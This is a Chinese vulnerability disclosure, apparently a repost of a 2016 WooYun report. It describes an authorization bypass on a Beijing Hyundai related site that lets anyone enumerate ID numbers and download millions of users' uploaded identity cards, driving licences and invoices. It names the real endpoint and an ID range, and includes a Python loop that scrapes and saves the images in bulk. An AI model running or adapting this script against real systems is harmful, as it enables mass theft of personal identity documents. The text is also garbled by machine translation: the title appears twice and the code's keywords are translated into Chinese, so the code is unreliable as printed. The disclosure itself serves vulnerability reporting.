北京现代某平台可越权遍历所有用户上传证件(涉及几百万身份证件/行驶证件/发票/驾驶证等)

漏洞标题 北京现代某平台可越权遍历所有用户上传证件(涉及几百万身份证件/行驶证件/发票/驾驶证等) 相关厂商 beijing-hyundai.com.cn 漏洞作者 路人甲 提交时间 2016-06-…

漏洞标题 北京现代的平台可以遍历所有用户上传文件(涉及数百万身份证件/驾驶证件/发票/驾驶执照等) 相关制造商 Beijing-hyundai.com.cn 漏洞作者 过路人 提交时间 2016-06-24 09: 29 公共时间 2016-06-29 09: 34 漏洞类型 未经授权的访问/许可绕过 危险等级 高 自我评估等级 15 漏洞状态 该漏洞已通知供应商,但供应商忽略了该漏洞 标签标签 漏洞详细信息 覆盖链接: http://zhihuan.xd2sc.com/CarExapp/imagelist.aspx?id=1400012 遍历身份证

使用数据,数百万个文档测试了从1400000到5431133的ID。 我写了一个批处理脚本并随机找到了100个ID。 #!/usr/bin/env python # - * - 编码: utf-8 - * - 导入urllib 导入重新 Def getImg(id): Url='http://zhihuan.xd2sc.com/CarExapp/imagelist.aspx?id=%s'%id Resp=urllib.urlopen(url) Imgurl=re.search(r'src='(。*?)'',resp.read()) 如果imgurl.group(1)=='': 通过 否则为: Imgurl='http://zhihuan.xd2sc.com/CarExapp/'+imgurl.group(1) Img=urllib.urlopen(imgurl).read() 使用open(str(id)+'。jpg','wb')作为fs: Fs.write(IMG) 如果__name__=='__ main__': 对于范围内的i(5000000,5000100): GETIMG(ⅰ)

漏洞证明: 修理计划: 控制权 版权声明:请注明出处。居民A @乌云